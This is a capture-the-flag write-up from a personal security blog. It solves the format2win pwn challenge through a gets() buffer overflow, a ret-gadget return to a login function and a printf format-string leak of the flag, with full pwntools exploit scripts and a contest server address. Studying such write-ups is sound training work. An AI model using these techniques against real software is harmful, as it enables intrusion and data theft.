<!doctype html>
<html lang="en-us">
  <head>
    <title>[BOH] format2win // Tzion</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.104.1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Tzion" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://tzion0.github.io/css/main.min.e1fda2b3aeeaca02fa5b7c35a05438808bf1292a3bb0de84260054c1a9cf3aca.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="[BOH] format2win"/>
<meta name="twitter:description" content="This challenge provided a binary file.
Since this is a pwn challenge, before we dig into it, let&rsquo;s see its security properties:
From result we can see that there is no PIE enabled and no stack canary.
Position Independent Executables (PIE) is a security measure that protect the binary and all of its dependencies by loading it into random locations within virtual memory each time the application is executed.
Stack canaries or security cookies are tell-tale values added to binaries during compilation to protect critical stack values like the Return Pointer against buffer overflow attacks."/>

    <meta property="og:title" content="[BOH] format2win" />
<meta property="og:description" content="This challenge provided a binary file.
Since this is a pwn challenge, before we dig into it, let&rsquo;s see its security properties:
From result we can see that there is no PIE enabled and no stack canary.
Position Independent Executables (PIE) is a security measure that protect the binary and all of its dependencies by loading it into random locations within virtual memory each time the application is executed.
Stack canaries or security cookies are tell-tale values added to binaries during compilation to protect critical stack values like the Return Pointer against buffer overflow attacks." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://tzion0.github.io/posts/boh2022-format2win/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2022-10-27T00:00:00+00:00" />
<meta property="article:modified_time" content="2022-10-27T00:00:00+00:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://tzion0.github.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="Tzion" /></a>
      <h1>Tzion</h1>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/about/">About</a>
             - 
          
          <a class="app-header-menu-item" href="/posts/">Blog</a>
             - 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
      </nav>
      <p>Yet Another Infosec Blog, Enjoy!</p>
      <div class="app-header-social">
        
          <a href="https://twitter.com/Tzion0" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-twitter">
  <title>My Twitter</title>
  <path d="M23 3a10.9 10.9 0 0 1-3.14 1.53 4.48 4.48 0 0 0-7.86 3v1A10.66 10.66 0 0 1 3 4s-4 9 5 13a11.64 11.64 0 0 1-7 2c9 5 20 0 20-11.5a4.5 4.5 0 0 0-.08-.83A7.72 7.72 0 0 0 23 3z"></path>
</svg>
          </a>
        
          <a href="https://github.com/Tzion0" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">[BOH] format2win</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Oct 27, 2022
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          5 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://tzion0.github.io/tags/boh/">BOH</a>
              <a class="tag" href="https://tzion0.github.io/tags/2022/">2022</a>
              <a class="tag" href="https://tzion0.github.io/tags/binexp/">BinExp</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <p>This challenge provided a binary file.</p>
<p>Since this is a pwn challenge, before we dig into it, let&rsquo;s see its security properties:</p>
<p><img src="/img/boh2022-format2win/img.png" alt="IMG"></p>
<p>From result we can see that there is no PIE enabled and no stack canary.</p>
<ul>
<li>
<p><strong>Position Independent Executables (PIE)</strong> is a security measure that protect the binary and all of its dependencies by loading it into random locations within virtual memory each time the application is executed.</p>
</li>
<li>
<p><strong>Stack canaries</strong> or <strong>security cookies</strong> are tell-tale values added to binaries during compilation to protect critical stack values like the Return Pointer against buffer overflow attacks.</p>
</li>
</ul>
<p>From attacker perspectives, this means we don&rsquo;t have to worry on finding <strong>base address</strong> of the binary during runtime, since PIE is disabled. While for disabled stack canary protection, this means we don&rsquo;t have to worry on leaking and placing back the canary in our exploit.</p>
<p>Now let&rsquo;s load the binary into <strong>Ghidra</strong>, a free and open source reverse engineering tool developed by the National Security Agency (NSA) of the United States.</p>
<p><img src="/img/boh2022-format2win/img2.png" alt="IMG"></p>
<ul>
<li>BLUE		: Symbol Tree of the binary</li>
<li>YELLOW	: Disassembly View of the binary</li>
<li>RED		: Decompiled View of the binary</li>
</ul>
<p>Looking in to the decompiled view of <strong>main</strong> function, we can see it just printing out some strings and accept input using <code>gets()</code>. However, there is a function called <code>login</code> looks like never been called:</p>
<p><img src="/img/boh2022-format2win/img3.png" alt="IMG"></p>
<p>Looking into the <code>login</code> function, we can see it will try to open the <code>flag.txt</code> and load its content into <code>local_98</code> variable using <code>fgets()</code>. And it print out the <code>local_98</code> using <code>printf()</code>:</p>
<p><img src="/img/boh2022-format2win/img4.png" alt="IMG"></p>
<h2 id="so-wheres-the-vulnerability">So, where&rsquo;s the vulnerability?</h2>
<p>First, the <code>gets()</code> in <code>main</code> function is a big no no in term of security, it can lead to Buffer Overflow (BOF) as it will read all available data passing to it into variable assigned regardless of it sizes. In our case the <code>local_58</code> char array has the size of 76 bytes, which means when we insert more than 76 bytes, BOF will occurs:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">char</span> local_58 [<span style="color:#ae81ff">76</span>];
</span></span><span style="display:flex;"><span><span style="color:#f92672">&lt;</span>SNIP<span style="color:#f92672">&gt;</span>
</span></span><span style="display:flex;"><span>gets(local_58);
</span></span></code></pre></div><p>Second, the <code>printf(local_d8)</code> in <code>login</code> function, since <code>printf()</code> is <strong>variadic</strong> function, which means it will pop data off from the stack according to the format given.</p>
<p>Usually we will write <code>printf()</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">// This is printing &#34;Hello World&#34; with the %s (string) format.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span>ex <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Hello World&#34;</span>;
</span></span><span style="display:flex;"><span>printf(<span style="color:#e6db74">&#34;%s&#34;</span>, ex);
</span></span></code></pre></div><p>However in our case the usage of the <code>printf()</code> in the binary is like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span>printf(local_d8);
</span></span></code></pre></div><p>This will lead to <strong>Format String Vulnerability</strong> as we can pass it formats like <code>%s %p %x</code> and etc to pop out the data off the stack.</p>
<h2 id="exploit-plan">Exploit plan</h2>
<p>With all of the information obtained, we can start planning the exploit. Its kinda obvious that first we need to overflow the return address of <strong>main</strong> by exploiting the <code>gets()</code> to redirect the control flow of binary to <code>login</code> function. After that, we can abuse the <code>printf(local_d8)</code> (Format String Vulnerability) to pop out the flag data off the stack. You might be wondering, why the flag data is in the stack? Well, this is because of this line of code in <code>login</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span>fgets(local_98, <span style="color:#ae81ff">0x80</span>, local_10);
</span></span></code></pre></div><p>The above line of code is essentially loading the flag data into <code>local_98</code> variable, but where do variables live? You&rsquo;re right, in STACK!</p>
<h2 id="before-we-begin-stack-introduction">Before we begin&hellip; (Stack Introduction)</h2>
<p>This section is an introduction of Stack for those who aren&rsquo;t familiar with, feel free to skip this part if you know how Stack operates.</p>
<p>Stack is an ordered collection of items where it PUSH/POP data on/off the stack using <strong>Last In First Out (LIFO)</strong> method. Whenever a function call is made, a stack frame will be created in the stack. Also, stack grows from higher address to lower address. Below is the example diagram of what <code>main</code> function briefly looks like in stack (Note: Details is not included to avoid confusion):</p>
<p><img src="/img/boh2022-format2win/img5.png" alt="IMG"></p>
<h2 id="exploit">Exploit</h2>
<p>Now let&rsquo;s start to create an exploit using <strong>pwntools</strong>! First, we need to figure out the amount of bytes required to overflow the <code>local_58</code> to change the return address of <code>main</code> function. We can do it using fuzzing, but since we have the binary given, we can directly obtain the information we need from Disassembly View:</p>
<p><img src="/img/boh2022-format2win/img6.png" alt="IMG"></p>
<p>From the picture above, we can see that to overflow to the return address, we need to overflow other variables along the way, where in our case the <code>local_c</code> will also be affected. Besides, we can see the amount of bytes required to reach return address which is <code>0x58</code> bytes. After that, we need to overwrite the return address to point it to address of <code>login</code> function, below is the illustration diagram:</p>
<p><img src="/img/boh2022-format2win/img7.png" alt="IMG"></p>
<p>Now we are in the login function, we will be inserting bunch of <code>%p</code> to leak data from the stack. Below is the exploit to test it locally:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-py" data-lang="py"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Set up pwntools for the correct architecture</span>
</span></span><span style="display:flex;"><span>exe <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;./format2win&#39;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This will automatically get context arch, bits, os etc</span>
</span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(exe, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Enable verbose logging so we can see exactly what is being sent (info/debug)</span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;info&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Start program</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">#io = remote(&#34;18.143.17.69&#34;, 9001)</span>
</span></span><span style="display:flex;"><span>io <span style="color:#f92672">=</span> process(exe)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>offset <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x58</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Construct payload</span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> flat([
</span></span><span style="display:flex;"><span>    offset <span style="color:#f92672">*</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;A&#39;</span>,
</span></span><span style="display:flex;"><span>    elf<span style="color:#f92672">.</span>symbols<span style="color:#f92672">.</span>login
</span></span><span style="display:flex;"><span>])
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendline(payload)
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&gt; &#39;</span>)
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;%p &#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">30</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Get our flag/shell</span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><h4 id="result">Result</h4>
<p><img src="/img/boh2022-format2win/img8.png" alt="IMG"></p>
<p>Looks good, we can see some ASCII-like hex values that looks like the flag (Local flag: FAKE{FLAG}):</p>
<p><img src="/img/boh2022-format2win/img9.png" alt="IMG"></p>
<p>However when we run it remotely, no flag shows up:</p>
<p><img src="/img/boh2022-format2win/img10.png" alt="IMG"></p>
<p>Execute the exploit remotely with debugging enabled shows this error:</p>
<p><img src="/img/boh2022-format2win/img11.png" alt="IMG"></p>
<p>From my past experiences, more or less this issue is related to <strong>Stack Alignment</strong>, we can fix it by adding a <code>ret</code> gadget before the return address. We can find the gadget using <code>ROPgadget</code>:</p>
<pre tabindex="0"><code>ROPgadget --binary format2win | grep ret
</code></pre><p><img src="/img/boh2022-format2win/img12.png" alt="IMG"></p>
<h3 id="final-exploit">Final Exploit</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-py" data-lang="py"><span style="display:flex;"><span><span style="color:#f92672">from</span> pwn <span style="color:#f92672">import</span> <span style="color:#f92672">*</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Set up pwntools for the correct architecture</span>
</span></span><span style="display:flex;"><span>exe <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;./format2win&#39;</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># This will automatically get context arch, bits, os etc</span>
</span></span><span style="display:flex;"><span>elf <span style="color:#f92672">=</span> context<span style="color:#f92672">.</span>binary <span style="color:#f92672">=</span> ELF(exe, checksec<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>)
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Enable verbose logging so we can see exactly what is being sent (info/debug)</span>
</span></span><span style="display:flex;"><span>context<span style="color:#f92672">.</span>log_level <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;info&#39;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Start program</span>
</span></span><span style="display:flex;"><span>io <span style="color:#f92672">=</span> remote(<span style="color:#e6db74">&#34;18.143.17.69&#34;</span>, <span style="color:#ae81ff">9001</span>)
</span></span><span style="display:flex;"><span><span style="color:#75715e">#io = process(exe)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>offset <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x58</span>
</span></span><span style="display:flex;"><span>ret <span style="color:#f92672">=</span> <span style="color:#ae81ff">0x0000000000401016</span> 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Construct payload</span>
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span> flat([
</span></span><span style="display:flex;"><span>    offset <span style="color:#f92672">*</span> <span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;A&#39;</span>,
</span></span><span style="display:flex;"><span>    ret,
</span></span><span style="display:flex;"><span>    elf<span style="color:#f92672">.</span>symbols<span style="color:#f92672">.</span>login
</span></span><span style="display:flex;"><span>])
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendline(payload)
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>recvuntil(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#39;&gt; &#39;</span>)
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>sendline(<span style="color:#e6db74">b</span><span style="color:#e6db74">&#34;%p &#34;</span> <span style="color:#f92672">*</span> <span style="color:#ae81ff">30</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e"># Get our flag/shell</span>
</span></span><span style="display:flex;"><span>io<span style="color:#f92672">.</span>interactive()
</span></span></code></pre></div><h4 id="result-1">Result</h4>
<p><img src="/img/boh2022-format2win/img13.png" alt="IMG"></p>
<p>Decode the hex values to obtain the flag:
<img src="/img/boh2022-format2win/img14.png" alt="IMG"></p>
<h3 id="flag">Flag:</h3>
<pre tabindex="0"><code>APUBOH22{134klng_d4t4_with_f0rm4t_sp3cifi3r}
</code></pre>
    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
